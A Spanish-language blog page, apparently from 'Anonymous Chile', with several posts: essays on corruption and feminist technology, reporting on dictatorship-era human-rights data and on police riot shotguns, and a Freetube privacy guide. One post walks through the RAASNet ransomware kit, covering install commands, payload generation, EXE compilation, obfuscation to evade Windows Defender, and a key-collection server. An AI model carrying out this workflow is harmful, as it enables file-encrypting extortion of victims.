La ‘discrecionalidad’ permite al sujeto autoritario ejercer su autoridad a discreción, es decir, ejercerla cómo y cuándo quiera; Falta de Control significa, por el contrario, que el individuo no responde a instancia alguna de sus actos, no está sujeto a control alguno. Esta ‘falta’ o carencia de control no la ignoran los organismos encargados del buen funcionamiento de una sociedad. No por otro motivo la carencia de control en el empleo de los recursos fiscales, en el reciente escándalo descubierto en las Municipalidades del barrio alto, ha sido duramente criticada por algunos ex fiscales y el propio Consejo Para La Transparencia CPLT.

Se puede entender, así, que el valor más preciado para el sujeto autoritario sea, en consecuencia, la libertad. Que todas sus luchas y argumentos se orienten en torno a la ‘libertad’, y que muchos de sus seguidores orienten sus luchas en esa prédica, ignorando algunos que la libertad que el autoritario exige para sí es la del zorro en el gallinero. Lo que puede explicar el notable de sarrollo que ha tenido la corrupción bajo la forma de acumulación actualmente vigente.

En consecuencia, para que la corrupción se desarrolle sin impedimentos no deberían existir aparatos o instituciones que ejerzan control alguno sobre los actos que ejecuta el sujeto autoritario. Sin embargo, a nuestro entender, hay un elemento más que debe considerarse. Ese no es otro que la reproducción de la conducta.

La reproducción de la conducta

La conducta reprochable que muestra un sujeto autoritario debe reproducirse una y otra vez para que adquiera el carácter de corrupción. La corrupción no es un acto aislado sino una forma de actuar, una forma de vida, si se quiere. Dado que los sujetos autoritarios actúan sin sujeción a norma alguna y no dan cuenta de sus actos, esa conducta se reproduce como forma de vida del espectro social. No de todos, por supuesto; pero de un grupo considerable. Fundamentalmente, es ejercida por la escena política del país y quienes son conocidos como ‘personalidades’. No lo olvidemos: el acto aislado no es corrupción porque aún no crea costumbre; pero eso sucede en la medida que el acto reprochable se reproduce. La reproducción de la conducta (RC) es trascendental en este aspecto. La sociedad se encuentra corrupta cuando los actos reprochables son cometidos por muchos de sus miembros.

No es, entonces, la ‘ocasión’ la que hace al ladrón, como reza el viejo adagio chileno, sino la concurrencia de un conjunto de factores, entre los cuales no puede dejarse de lado la reproducción. En consecuencia, la corrupción no es un problema de la esencia humana, de perversión humana como parecen creerlo algunos académicos, sino la adaptación de una conducta a una forma de vida que existe en determinado sector social. En Grecia (Esparta), nos recuerdan los historiadores, el robo estaba permitido: lo que se penaba por la autoridad espartana no era el acto de apoderarse de un bien ajeno sino el dejarse sorprender. Costumbre que puede sorprender a más de alguien hoy.

Cómo se reproduce una conducta

La reproducción de una conducta se manifiesta en la adopción de una cultura. La corrupción no recorre un camino diferente: impone una cultura. No es porque sí que los miembros de la ‘elite política’ de una nación se protegen entre ellos; no es porque sí que existen normas ‘morales’ entre la delincuencia respecto a la comisión de sus actos delictivos. La ‘ley de la omertá’ es un ejemplo de ello; también los llamados ‘pactos de silencio’, comunes en los institutos armados.

Pero es importante destacar algo más: la reproducción de una conducta reprochable se hace fácil en la sociedad capitalista pues el modelo ideal sobre el cual se organiza la forma de vida de una sociedad de esa naturaleza es la conducta de sus dirigentes. Se organiza, así, una cultura de la corrupción que no se da solamente en los sectores altos de la sociedad sino, además en los bajos, que reaccionan a la manera que nos lo recuerda el maestro de Tréveris:

«Cuando los de arriba tocan el violín, los de abajo no pueden sino ponerse a bailar».

Concepción más o menos similar a la que señala Gogol en sus obras:

Resulta, de todos modos, más conveniente que un subordinado se adapte a la forma de ser de su jefe, que no el que un jefe se adapte a la manera de ser de sus subordinados. Es más en armonía, con el orden de las cosas y más fácil, porque el subordinado tiene un solo jefe, mientras que el jefe tiene cientos de subordinados.

Y es que la reproducción de la conducta del superior en el inferior no sigue sino los mismos parámetros de la cultura, de tal manera que podemos decir, sin temor a equivocarnos, que la cultura de los sectores dominantes es la cultura de los sectores dominados. Más, aún: repitamos con Karl Marx que quien ejerce el poder material de una sociedad, ejerce también su poder espiritual.

De lo cual se infiere que la fórmula C=(A+D)-FC, para ser más exacta, debería contener la reproducción de la conducta como algo primordial.

La corrupción de la sociedad chilena

La sociedad chilena fue organizada, precisamente, para que sus estamentos superiores gozaran de la plenitud del poder. No es casualidad que el presidencialismo chileno sea uno (si no, el único) de los más extremos del mundo; ni que las empresas e instituciones del Estado, actúen con la más absoluta autonomía. No fue casualidad, tampoco, que la constitución fuese impuesta a la ciudadanía sin consultar su voluntad ni que se concediera autonomía financiera a los institutos armados; tampoco que se diera autonomía institucional a las FFAA destruyendo el control del poder civil sobre las mismas. Del mismo modo, no es casual que se privase de toda facultad fiscalizadora de los organismos sometidos a su tuición, a las Superintendencias, y que se liberara a las Municipalidades de la tutela de la Contraloría. Y así, podríamos seguir señalando casos y más casos que reafirman la inequívoca intención de las clases dominantes de entregar el uso y abuso de los recursos estatales a personas que se encuentran exentas de responsabilidad en cuanto al empleo de los fondos de las empresas e instituciones a su cargo.

Podemos, en consecuencia, afirmar que la sociedad chilena fue organizada para entregar la más amplia libertad de acción a aquellos que se hacían con el poder en la misma, y no a la ciudadanía.

Rasgos principales del corrupto

El sujeto corrupto no se arrepiente de los actos reprochables que ejecuta; por el contrario, persevera en ellos, los vuelve a cometer una y otra vez. No lo hace por maldad sino porque está convencido que tiene derecho a hacerlo; por eso no pide disculpas. Cree ser parte de un estamento al que todo le está permitido. Reivindica su carácter de clase. Y como está convencido de ello, que ejecutar semejantes actos es ‘su’ derecho, le desconoce a los demás la facultad de llevarlos a cabo: el corrupto es el típico sujeto que ve la paja ‘en el ojo ajeno y la viga jamás mira en el propio’. Por eso, es el primero en protestar desaforadamente cuando un adversario suyo realiza actos que solamente considera propios de su autoría, exigiendo condenarlo a las penas del Infierno
.

Un acercamiento a la contingencia diaria

La problemática de las clases sociales nos conduce a entender que no debe extrañar, por lo mismo, que el ‘caso’ de un convencional constituyente como Rodrigo Rojas, haya causado tanto revuelo. Porque las clases dominantes y sus fracciones establecen ‘raseros’ comunes a todos. En sus concepciones, todos somos iguales porque tenemos el rasero común de la pertenencia a una estirpe. Y, establecida una calidad común a un grupo humano (la pertenencia, en este caso, a la categoría de ‘convencionales constituyentes’), son todos mirados como iguales en circunstancia que no lo son y, por lo mismo, se les exigen idénticas cargas y responsabilidades. Las diferencias de clase desaparecen como por encanto; y no lo hacen de manera diferente a como sucede en las justas electorales: todos somos iguales porque todos tenemos derecho a voto. Entonces, el verdadero constituyente corrupto levantará su voz para demonizar a quien, dentro del grupo, comete un error que estima grave, e incitará a otros a hacerlo. Porque igualar a los seres en determinada calidad hace realidad el poema de Jorge Manrique según el cual, ‘allegados a la muerte son iguales los que viven de su suerte y los ricos’.

Una respuesta al Sr. Bates

No podemos afirmar, entonces, lisa y llanamente —como lo hace el académico Luis Bates—, que la corrupción es intrínseca a la naturaleza del ser humano sin arriesgarnos a formular una barbaridad de la que, más tarde, podríamos arrepentirnos. La corrupción no existe en el éter sino se manifiesta en la medida que se vive en sociedad; depende, además, del grado de presión que los distintos componentes de la fórmula antes enunciada ejercen sobre el necesario equilibrio que las tendencias autoconfirmantes e integradoras mantienen entre sí. Los seres humanos nacen a la vida, como todos los demás seres de la naturaleza. No son buenos ni malos; son seres que, simplemente, nacen. Y que son lanzados a la vida para aprender allí el arte de sobrevivir. No hay una maldición bíblica acerca de algún fruto prohibido que nos haga llegar con una mácula a enfrentar la lucha por la vida. No basta la tradición judeo cristiana para explicar el fenómeno de la corrupción. Por más que quien quiera hacerlo exhiba títulos y menciones que lo habilitan para ello.

Tejer sentidos para una tecnología co-responsable desde el feminismo y los territorios

Publicada el 15/10/2021 - 14/10/2021 por Anonymous Chile

Sentirnos, preguntarnos, implicarnos, escucharnos, [re]conocernos, vincularnos. La experiencia de acercarse a procesos-otros, ¿nos abre mundos de posibilidades?

Nuestros entornos han cambiado de forma muy veloz, incluso si antes de estos prolongados periodos de cuarentenas nuestra gestión del tiempo, los vínculos y afectos estaban fuertemente atravesados por procesos remotos. A la vez, la pandemia ha hecho que el impacto ambiental se convierta en una experiencia cercana demostrándonos que estamos en estrecha conexión: lo que afecta a las personas también afecta al ambiente, y viceversa.

Las evidencias existentes hacen difícil desestimar la crisis civilizatoria que atravesamos, sin embargo, los discursos dominantes mantienen las recetas de más “crecimiento y desarrollo” para enfrentarla. Las mismas recetas que nos llevaron hasta donde estamos.

Uno de los ámbitos que mejor da cuenta de este fenómeno es el tecnológico. Anclado en concepciones centradas en modelos capitalistas, heteropatriarcales y coloniales la materialidad de las tecnologías se implica en un modelo extractivo que refuerza las lógicas de consumo indiscriminado de bienes como el agua, los minerales, el aire, las personas, la información y los procesos como la producción de energías, compuestos químicos o la minería de datos. Basándose en un pensamiento único, lineal y acumulativo, las tecnologías digitales están ancladas en el capitalismo neoliberal que desterritorializa personas y procesos con lógicas de producción y consumo ilimitado. Desde su diseño, estas tecnologías están pensadas para ser construidas para un mundo de recursos infinitos.

Sin embargo, vivimos en un mundo con recursos finitos, de ciclos y no de sistemas lineales, donde las personas transitan en cada pequeño detalle de esas cadenas de producción, aún cuando los propios sistemas omitan agregar ese “factor”. Además, en estos sistemas algunas personas son más escuchadas que otras: el entramado de políticas públicas y diplomacia económica beneficia a las corporaciones por sobre las poblaciones locales.

Esta visión fragmentada de la realidad y la tecnología desconecta deliberadamente las afectaciones de sus causas. Las dicotomías urbano/rural, desarrollo/subdesarrollo, inclusión/exclusión frecuentes en las narrativas occidentales, no reconocen las diferentes formas de existencia en los territorios locales. Un modelo de desarrollo tecnológico que se ancla en esta concepción extractivista implica fuertes impactos negativos tanto en las sociedades como en el ambiente. A la vez, pensar dentro del capitalismo solo posibilita plantear soluciones capitalistas.

A las afueras de las cajas del sentido común

Los feminismos nos acercan a politizar nuestro día a día, también para atender los cuidados desde propuestas que nos miren en relación con les otres y lo otro. Los ambientalismos, en particular los anclados en contextos locales y de base, politizan la relación de la humanidad con los entornos naturales invitando a vernos dentro de ella y no como escisión. Ambas perspectivas políticas posibilitan pensarnos desde fuera de las cajas del “sentido común”, incomodan las “verdades” adquiridas disputando sentidos, defendiendo territorios, tejiendo relaciones, construyendo desde la diversidad.

Acercarnos al diseño, producción, uso y desecho de tecnologías con lentes feministas y ambientalistas potencia ser parte de los procesos detrás de internet. Si despolitizar es desafectar las relaciones, nuestro propósito tiene que ser politizar y tejernos a través de los afectos y las afectaciones, es decir, acercarnos a acciones de co-responsabilidad.

En permacultura suele decirse que es deseable mantener cerca los impactos que generamos. De esa forma podemos observar, escuchar, aprender y transformar nuestras acciones. En nuestras sociedades, sobre todo si habitamos zonas urbanas, estamos cada vez más alejadas de éstos: ¿cómo saber qué marca podría producir nuestra navegación diaria en internet, si en la mayoría de los casos siquiera conocemos dónde va nuestra bolsa de basura tras dejarla en el depósito o de dónde vienen las aguas que salen de nuestros grifos? Alejar a las personas de éstas y otras infraestructuras es una estrategia tramposa que nos desvincula de las múltiples soluciones tecnológicas que habitan nuestro día a día. También respecto a nuestra conexión a internet.

Las tecnologías como dispositivos relacionales

Establecer una distancia crítica con las tecnologías es deseable y necesaria. Cuestionar sus algoritmos tanto como las rutas de su producción es un paso inicial para empezar a transformarlas. Por eso las propuestas necesitan ser planteadas en distintos niveles y con diferentes alcances, combinando tecnologías locales, articulación regional, conocimiento compartido, diversidad, co-responsabilidad.

El modelo de desarrollo tecnológico actual reproduce una lógica de división. Sin embargo, en algunas cosmovisiones, sean ambientales o feministas, indígenas o campesinas, interseccionales o ancladas en los territorios, la naturaleza y los demás seres vivientes están estrechamente relacionados como parte de la continuidad de la existencia. Concebir la humanidad como parte de su entorno natural posibilitaría relaciones sociotécnicas más armónicas. O al menos no extractivistas.

Para construir tecnologías futuras que respondan al cuidado de la vida se hace necesario reconectar con modelos de consumo locales, cercanos, que propicien la diversidad y la conexión con las personas productoras, que escuchen los ciclos de la vida (la naturaleza tarda millones de años en producir minerales o el petróleo), con diseños que respondan a esas premisas.

Las tecnologías no son artefactos sino dispositivos relacionales. Son relaciones de implicación, de afectación, de cuidado y tejido colectivo. Por eso construir tecnologías distintas al modelo de desarrollo actual resulta esencial para tejer otras formas de relacionarnos.

Esos otros desarrollos, más respetuosos de las necesidades de les otres y lo otro nos permitirán también relocalizar las tecnologías y su circulación, avanzar sobre modelos abiertos de desarrollo de software y de hardware que sostengan estas premisas, disminuir el consumo y diversificarlo, responder a problemáticas que abonen a propuestas basadas en el cuidado a las poblaciones, comunidades y entornos.

Una internet territorial y feminista respeta la vida en todas sus formas, no la consume, resignifica el cuidado hacia una ética de los cuidados colectivos al elegir sobre su diseño, extracción, producción, consumo y desecho, generando vínculos y no solo interacciones entre las múltiples capas materiales e inmateriales que la conforman. Habilitan un lugar más digno para desobedecer las lógicas impuestas y también para tejer juntas. Quizás ese sea el desarrollo tecnológico que permitiría ver un impacto deseado en los mundos que habitamos.

Informes de DD.HH. en dictadura: datos sin perspectiva de género

Publicada el 15/10/2021 - 14/10/2021 por Anonymous Chile

El pasado 11 de septiembre se conmemoraron 48 años del Golpe de Estado que marcó el inicio de la dictadura cívico-militar en Chile. Este año, para recordar el momento más doloroso del Chile reciente, como Observatorio de Datos y Estadísticas de Género e Interseccionalidades de Chile (ODEGI) quisimos honrar las historias de las mujeres cuyos derechos humanos fueron violados durante la dictadura. Sin embargo, luego de buscar exhaustivamente casi no encontramos información.

Hasta hoy, prácticamente todo lo que conocemos sobre las víctimas de violaciones a los derechos humanos en dictadura proviene de las declaraciones de las víctimas, familiares y testigos plasmadas en las tres comisiones de verdad que se han realizado. A pesar de su aporte invaluable, estas instancias son un claro ejemplo de lo que ocurre cuando se construye y procesa la información con escasa o nula perspectiva de género.

En la actualidad, existe un amplio consenso —y los mismos informes lo reconocen— en que las cifras oficiales de mujeres víctimas de la dictadura distan enormemente de la realidad. Y la deuda por visibilizar las atrocidades a las que fueron sometidas hoy sigue pendiente.

El Informe de la Comisión Nacional de Verdad y Reconciliación (conocido como Informe Rettig) es el caso que mejor ilustra esta invisibilización: solo un 6 por ciento de las víctimas identificadas son mujeres, y temas vinculados a violaciones y vejaciones sexuales fueron solo abordados descriptivamente.

Cuando el informe fue desarrollado, la sociedad chilena era considerablemente más conservadora que la de hoy y aún menos consciente de las inequidades de género estructurales del patriarcado. De ahí que asumir la tortura sexual como una práctica sistematizada de violencia política sexual contra las mujeres, era una verdad incómoda y brutal que se optó por no conocer. Esto nos tiene que servir de recuerdo: los datos y la información jamás son ajenos al contexto del que fueron creados. Que no se haya clasificado no quiere decir que no ocurrió.

El Informe Valech subsanó en parte esta invisibilización e incluyó un capítulo dedicado a mujeres víctimas de violencia político sexual, además de reconocer las violaciones y vejaciones sexuales como un método de tortura sistemático contra las mujeres en dictadura. Un 12,5 por ciento de las personas declarantes fueron mujeres, la mayoría de ellas víctimas de violencia sexual. Las organizaciones feministas de ese entonces fueron actoras clave para avanzar hacia el reconocimiento de los temas de género en el informe. Esta experiencia nos deja una segunda lección: la sociedad civil es fundamental para influir en los procesos de recolección de testimonios, datos e información. Debemos cuestionar el contexto en que estos datos son producidos y preguntarnos sobre cómo la forma en que se distribuye el poder puede sesgar los resultados.

Como sociedad tenemos la deuda de organizar y recolectar los testimonios faltantes desde una perspectiva de género. Pese a los avances que se han logrado gracias a la constante lucha de agrupaciones de derechos humanos y familiares y de organizaciones feministas por conocer la verdad y hacer justicia, estamos lejos de conocer la cifra real de mujeres que fueron víctimas de violaciones a los derechos humanos, y más aún de tener datos sobre víctimas de la comunidad LGBTIQ+. El desafío de subsanar esta deuda, requiere inevitablemente que se rompan los pactos de silencio de autoridades e integrantes de las Fuerzas Armadas; se levante el secreto que pesa sobre las declaraciones, testimonios y documentos del informe Valech 1 y que se creen instancias de calificación permanente para víctimas de violaciones de derechos humanos.

Desde ODEGI, creemos que la sistematización, la recopilación y el acceso a estos datos desde una perspectiva de género, son una manera fundamental para reconstruir nuestra memoria y conocer la verdad de las personas víctimas y sus responsables. El acceso a la verdad es la única vía que tenemos para hacer justicia, reparar a las víctimas y establecer garantías de no repetición.

1 comentario

Investigando el funcionamiento de un Ransomware-as-a-Service con RaasNet

Publicada el 12/10/2021 - 12/10/2021 por Anonymous Chile

RAASnet es un proyecto escrito en Python que se creó para demostrar lo fácil que es desarrollar ransomware y estudiar o analizar su funcionamiento. El script se encuentra disponible para Microsoft Windows, GNU/Linux y MacOS. En Microsoft Windows se recomienda compilar payload.py en formato EXE para hacerlo más portátil.

Principales características

  • Generar una carga útil de ransomware
  • Con o sin carga útil GUI
  • Funciona en Microsoft Windows, GNU/Linux y MacOS
  • Encriptación súper rápida con PyCrypto
  • Compilación a EXE, APP o ejecutable Unix/Linux
  • Icono personalizado para su carga útil EXE
  • Recibe las claves de las víctimas
  • Desencriptar archivos
  • Modo de demostración (la carga útil no encripta nada)
  • Modo de pantalla completa (la advertencia ocupa toda la pantalla)
  • Mensaje de advertencia personalizado para su víctima
  • Imagen personalizada en su carga útil
  • Modo fantasma (cambia el nombre añadiendo la extensión .DEMON en lugar de cifrar los archivos)
  • Múltiples métodos de encriptación
  • Seleccione las extensiones de los archivos a los que va dirigido
  • Decida si el payload debe autodestruirse (sólo en modo consola)
  • Decidir la unidad de destino para el cifrado (directorio de trabajo)
  • Acceso al servidor verificado a través del reenvío de puertos VPN
  • Codificar la carga útil como código Morse

Instalación

Primero, descargamos e instalamos la última versión de Python 3. Posteriormente, procedemos con la ejecución de los siguientes comandos:

git clone https://github.com/leonv024/RAASNet.git
pip3 install -r requirements.txt
python3 RAASNet.py

Cabe mencionar que, como anotación importante, en GNU/Linux podríamos necesitar instalar python3-tk, python3-pil, python3-pil.imagetk, libgeoip1, libgeoip-dev y geoip-bin.

Registro

El primer paso, evidentemente, es registrarnos en la plataforma de RaaS (Ransomware-As-A-Service), en este caso contra la URL https://zeznzo.nl/req.py en el cloud de Google, por lo cual es prudente utilizar información totalmente falsa ingresando datos que no se relacionen de ninguna manera con nuestra persona:

También podemos atacar directamente al servicio onion (TOR) del operador: https://hplqdv5fo3vw3fjyamyer7yuc7xtvtop2j3fipc7psf3pxvhoqjoqkid.onion

Si todo marcha bien, ingresaremos nuestras credenciales y nos encontraremos con el panel de control del afiliado:

Generando el payload

El siguiente paso es generar el payload que debe ser ejecutado en el equipo de la victíma. Si hacemos clic en el menú GENERATE PAYLOAD abriremos otro menú con algunas opciones interesantes:

Como, por ejemplo, entre otras opciones podemos cambiar el mensaje de extorsión o ransom:

O también el método de cifrado, que en la presente demostración mantendremos como PyCrypto. Si pulsamos el botón GENERATE la salida serán dos scripts en Python: el payload y el decryptor correspondiente.

Si echamos un vistazo al código comprobaremos qué fácil resulta el proceso de cifrado y descifrado seleccionados:

Cifrado con payload.py:

Descifrado con decryptor.py:

Como podemos observar, se trata de un cifrado en bloque (CBC) con AES. El mensaje debe tener un tamaño o longitud de 16 bits, por lo cual se rellena con ceros hasta completarlo. No obstante, además de la clave, AES también necesita un vector de inicialización (Initialization Vector). Este vector de inicialización se genera con cada cifrado, y su propósito es producir diferentes datos cifrados para que un atacante no pueda hacer un criptoanálisis para inferir la clave o los datos en claro de los mensajes.

Ahora que tenemos el payload y el decryptor, si nuestra víctima utiliza Microsoft Windows nos interesará compilar el script a EXE para hacerlo portable:

Sin embargo, debemos recordar que ambos payloads, el script en Python y el EXE, son detectados por Windows Defender:

De esta forma, si queremos que se ejecute en la máquina de la víctima tendremos que cambiar el encoder (por defecto morse) u ofuscarlo previamente mediante pyarmor u otra herramienta.

Tampoco olvidemos levantar el servidor que recibirá las claves en cuanto el ransomware la genere para cifrar los archivos:

Si todo sigue bien, el ransomware generará el típico mensaje de aviso/extorsión:

Todos los ficheros en la ruta especificada habrán sido cifrados y renombrados añadiendo la extensión .DEMON:

Por otra parte, como podremos apreciar, en el código del payload.py la clave se enviará al recolector de claves:

Y, del mismo modo, al servidor del operador del RaaS:

De esta manera, el susodicho podrá verlo sin problemas en el panel de control al momento de acceder a su cuenta:

Una vez que se negocie la extorsión correspondiente y la víctima obtenga la clave, podrá descifrar sus archivos fácilmente con el decryptor.

Lo primero que tendrá que hacer es seleccionar el tipo de cifrado oportuno:

Introducir la clave:

Y seleccionar la ruta donde los archivos fueron cifrados:

Algo importante que debemos tener en cuenta es que si se introduce una clave incorrecta los archivos a recuperar podrían corromperse y perderse:

Pero si todo marcha correctamente, la victima recuperará sus archivos:

Repositorio del proyecto en Github: RaasNet

155 comentarios

Informe de Carabineros de Chile en 2012 advirtió sobre los daños provocados por escopetas antidisturbios

Publicada el 12/10/2021 - 12/10/2021 por Anonymous Chile

Un peritaje elaborado hace casi 9 años por el Departamento de Criminalística recomendó disparar a más de 30 metros del blanco y solo apuntando al tercio inferior del cuerpo de los manifestantes. Disparos a menor distancia, advirtió el informe, pueden ser letales –si impactan en el cuello– o provocar estallido ocular, fractura craneal y laceraciones hemorrágicas en el abdomen, entre otros efectos. El documento demuestra que Carabineros conocía los riesgos de usar esta arma y que las advertencias fueron ignoradas en las manifestaciones recientes, en las que ya se han registrado más de 220 lesiones oculares.

Después de la última ronda de disparos, la doctora Vivian Bustos y la capitana Carla Fernández no tuvieron dudas sobre la peligrosidad de los perdigones que utilizan las escopetas antidisturbios de Carabineros. Ambas certificaron que podían provocar lesiones letales (si los tiros impactan en tejidos blandos del cuello), además de estallido ocular, fractura craneal, laceraciones hemorrágicas en el abdomen y contusiones en los genitales, entre otros efectos graves.

Esa prueba balística se efectuó exactamente el día Miercoles 21 de noviembre de 2012. Tras realizarla, la doctora Bustos y la capitana Fernández suscribieron un documento de 22 páginas cuya principal conclusión advirtió sobre las precauciones que el personal policial debía tomar para cumplir con el objetivo de disolver las manifestaciones sin provocar lesiones graves:

«Se recomienda el uso de la escopeta antidisturbios en Carabineros de Chile a una distancia superior a los 30 metros y apuntando siempre hacia el tercio medio inferior del cuerpo, ya que corresponde a zonas menos vulnerables o expuestas, al estar protegidas por las vestimentas y el calzado, con la finalidad de evitar la generación de lesiones graves durante su uso y solo se cumpla la función de dispersar a las personas».

Este peritaje demuestra que Carabineros siempre ha sabido que el uso de su escopeta antidisturbios calibre 12mm, cargada con cartuchos de perdigones de 8mm –los mismos que ahora son cuestionados por contener plomo–, puede ser letal o causar daño ocular grave, si no se adoptan los resguardos correspondientes. Casos como los del joven Gustavo Gatica, quien fue herido en sus dos ojos y sufrió pérdida total de la visión, o de Rolando Ortega, herido en el cuello en Valparaíso que se mantuvo internado en estado grave, demuestran que estas precauciones no han sido observadas por el personal de Fuerzas Especiales durante las manifestaciones que se iniciaron el 18 de octubre del año 2019.

Todas las advertencias realizadas por el Colegio Médico y el Instituto Nacional de Derechos Humanos –por la gran cantidad de heridos en los ojos– y ahora este documento, refuerzan los argumentos que apuntan a la responsabilidad penal del mando de Carabineros y de las autoridades civiles, incluyendo la Presidencia de la República, por no haber reaccionado a tiempo para detener actos que dieron pie a violaciones de derechos humanos.


Manifestante herido por perdigones

El día Martes 19 de noviembre del año 2019, el general director de Carabineros, Mario Rozas, anunció que se limitaría el uso de la escopeta antidisturbios solo a situaciones de riesgo vital. Pero, lo hizo 24 días después de la primera advertencia del Colegio Médico sobre las graves lesiones oculares y cuando las personas con este tipo de heridas ya sumaban más de 220.

No hay dudas, efectivos de Fuerzas Especiales han impactado con sus municiones antidisturbios en la parte superior del cuerpo de los manifestantes, ignorando el mencionado informe en disputa realizado por el propio Departamento de Criminalística de su institución. Ese documento, titulado “Disparos con escopeta antidisturbios, con empleo de cartuchería con perdigón de goma y sus efectos en la superficie del cuerpo humano”, detalló los efectos más graves que los tiros podían causar en el cuerpo humano. Para ello se dispararon rondas a 5, 10, 15, 20, 25 y 30 metros del blanco.

“Luego de analizar los daños generados (…), es posible establecer que entre los 5 y los 25 metros de distancia, existe una clara posibilidad de generar en la superficie corporal lesiones de carácter grave”, señala el informe. El peritaje desaconseja utilizar la escopeta a menos de 30 metros, porque “existe el riesgo de generar una lesión ocular, que podría implicar la pérdida del ojo (…). Y apuntando siempre hacia el tercio medio inferior del cuerpo”.

5 metros: «fractura craneal»

El peritaje fue encargado por el Departamento de Gestión Educacional de la Dirección de Educación, Doctrina e Historia, para capacitar al personal en el manejo adecuado de las escopetas antidisturbios. Este es el objetivo declarado en la página 2 del informe:

“Informar (…) los efectos y lesiones que podrían causar los perdigones de goma, disparados con escopetas antidisturbios en actual uso en Carabineros de Chile, en la superficie corporal de personas, con el fin de ser tomadas en consideración en la elaboración y diseño del curso de capacitación orientado al correcto uso del arma antes mencionada”.

El peritaje comenzó a las 15:00 del 21 de noviembre de 2012, cuando el equipo comandado por la capitana Fernández (especialista en criminalística y perito balístico) llegó al polígono de tiro de la Escuela de Carabineros Carlos Ibáñez del Campo, en la Comuna de Providencia, ciudad de Santiago. El grupo era integrado por la doctora Bustos (médico legista y asesora del Departamento de Criminalística), el suboficial mayor Luis Peña y el sargento 1° Orlando Candia (fotógrafo).

Los blancos estaban hechos con planchas de madera terciada de 9 milímetros de espesor, las que técnicamente simulan la densidad del cuerpo humano “tanto en hueso como en tejido blando”, según señala el reporte.


Manifestante herido en su ojo por un perdigón

El suboficial Peña insertó en una escopeta Hatsan, modelo Escort, un cartucho balístico calibre 12mm, con doce perdigones de goma marca TEC. De pie, apoyó el arma en su hombro y disparó al blanco, ubicado a sólo cinco metros.

El sargento Candia fotografió los impactos en el blanco y las profesionales los analizaron: “Los perdigones traspasaron totalmente la madera en su parte posterior, con pérdida de material”, quedó plasmado en el informe.

El documento consignó que un disparo a cinco metros podía provocar fractura de costillas y de hueso craneal, heridas penetrantes en el rostro, estallidos oculares, lesiones en los brazos, laceraciones hemorrágicas en el abdomen y contusiones en los genitales, además de roturas en los carpios y metacarpios de manos y pies.

En el caso de niños y ancianos, un tiro a cinco metros, además, generaría fracturas en los huesos largos de las piernas.

10 metros: «posibilidad de muerte»

El suboficial Peña disparó después a una distancia de diez metros. De los doce perdigones contenidos en el cartucho, diez impactaron en el blanco. Nuevamente, traspasaron la madera, aunque en esta ocasión “con menor pérdida de material”.

La tabla que resumió los posibles daños corporales volvió a llenarse de datos que resultan alarmantes: “En cuello, posibilidad de herida en tejido blando y eventual lesión vascular, con posibilidad de muerte”.

También describieron el riesgo de heridas penetrantes en el abdomen y desgarros en los genitales, además de lesiones diversas en manos, piernas, brazos y pies.


Carabineros disparando perdigones en la Alameda, Santiago.

La escena se repitió con el suboficial mayor Luis Peña apuntando a blancos situados a 10, 15, 20 y 25 metros. Y la conclusión fue la misma. A esas distancias, hay posibilidad de muerte si el disparo impactaba en una zona del cuello con eventual compromiso vascular. También se mantenía el riesgo de estallidos oculares, además de las lesiones abdominales.

Finalmente, el suboficial Peña disparó a un blanco situado a 30 metros. A esa distancia, la pérdida de precisión fue enorme. De los doce perdigones contenidos en el cartucho, sólo dos impactaron en el blanco.

Sin embargo, el riesgo de estallido ocular persistió, como quedó consignado en la tabla elaborada por la doctora Bustos y la capitana Fernández.

De allí que el peritaje indique en sus recomendaciones finales que la escopeta solo se utilice con un blanco ubicado a más de 30 metros y apuntando al “tercio medio inferior del cuerpo”. Si la justicia acoge las denuncias de los afectados por los escopetazos de Carabineros y se investiga por qué Chile ha llegado a ostentar el amargo récord de la mayor cantidad de manifestantes con lesiones oculares, la respuesta está aquí.

171 comentarios

Evadiendo el seguimiento, rastreo, espionaje y vigilancia de Youtube con Freetube

Publicada el 09/10/2021 - 08/10/2021 por Anonymous Chile

Usualmente cuando queremos mirar algo en Youtube suele preocuparnos el seguimiento y vigilancia que esta plataforma podría ejercer sobre nuestro navegador web y dirección IP inyectando todas las cookies y código Javascript que le sea posible. Para solucionar ese problema, entre muchas otras opciones, aparece Invidious, el cual es un software libre y descentralizado que trabaja como proxy front-end indexando, registrando y mostrando vídeos y contenidos de Youtube. De esa manera, no necesitamos visitar la plataforma de Youtube directamente sino que ingresamos a la página web de algún nodo de Invidious en su lugar.

En consecuencia, podemos empoderarnos sobre las tecnologías que maneja y se ejecutan en nuestro navegador web y tomar el control minimizando el tráfico de ancho de banda, evadiendo el espionaje y vigilancia sin ejecutar el javascript y códigos privativos de Youtube. Entre otras opciones, también tenemos la posibilidad de descargar vídeos en varias calidades de imágen y audio, así como inyectarlos en otras páginas, crear listas de reproducción y guardar suscripciones sin tener una cuenta en Google. Para conocer algunos nodos de Invidious, favor de visitar la página web oficial del proyecto.

Ahora bien, en base a Invidious, nace Freetube, un cliente y reproductor de Invidious, y por tanto de Youtube, para escritorio, enfocado a la privacidad, multiplataforma, licenciado bajo AGPLv3, traducido en múltiples idiomas y con un diseño muy amigable para el usuario promedio, que se conecta a un nodo de Invidious por defecto o el que nosotros prefiramos, importando e incorporando así todas las mejoras y novedades que Invidious pueda ofrecer. Desde descargar vídeos en alta definición, convertirlos en audio de múltiples formatos, guardar localmente un historial de nuestros vídeos vistos, favoritos y suscritos, bloqueando el seguimiento, espionaje, rastreo, vigilancia, cookies y Javascript de Youtube y personalizar una interfaz totalmente a la medida de cada uno, hasta incluir la opción para torificar nuestra conexión, es decir tunelizarla dentro de TOR, anonimizando así nuestra identidad, dirección IP y ubicación geográfica en Internet, y todo esto sin llegar a conectarse a Youtube ni a Google jamás porque de eso se encarga el nodo de Invidious.

Para proceder a la instalación del mencionado en disputa podemos buscar en su página web oficial y/o su repositorio en Github donde se proveen los enlaces de descarga de binarios precompilados que permiten tanto ejecutar el software directamente de forma anidada como instalarlo en el equipo y también compilarlo desde el código fuente.

En el caso de Windows, podremos encontrar sus correspondientes medios de instalación en la página oficial del proyecto.

En caso de distribuciones GNU/Linux y derivadas:

  • Debian GNU/Linux y derivadas:

Seguir leyendo «Evadiendo el seguimiento, rastreo, espionaje y vigilancia de Youtube con Freetube» →

174 comentarios

Estado de excepción y toque de queda generan negativos efectos de inseguridad urbana en la sociedad chilena

Publicada el 09/10/2021 - 08/10/2021 por Anonymous Chile

